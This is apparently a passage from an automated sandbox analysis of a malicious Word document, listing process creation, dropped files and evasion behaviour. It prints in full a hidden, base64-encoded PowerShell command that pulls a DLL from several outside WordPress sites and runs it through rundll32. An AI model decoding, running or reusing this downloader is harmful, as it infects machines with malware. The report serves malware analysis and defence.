ZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF00270D70 pushad ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001D08D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001B39A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001B2A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001B5BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001B5C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001B548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001B2CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001B1740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001B08D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001939A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00192A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00195BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00195C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00192CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00191740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003808D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003639A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00362A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00365BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00365C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0036548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00362CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00361740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002408D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002239A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00222A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00225BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00225C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022548F push ebp; retf

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oymJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
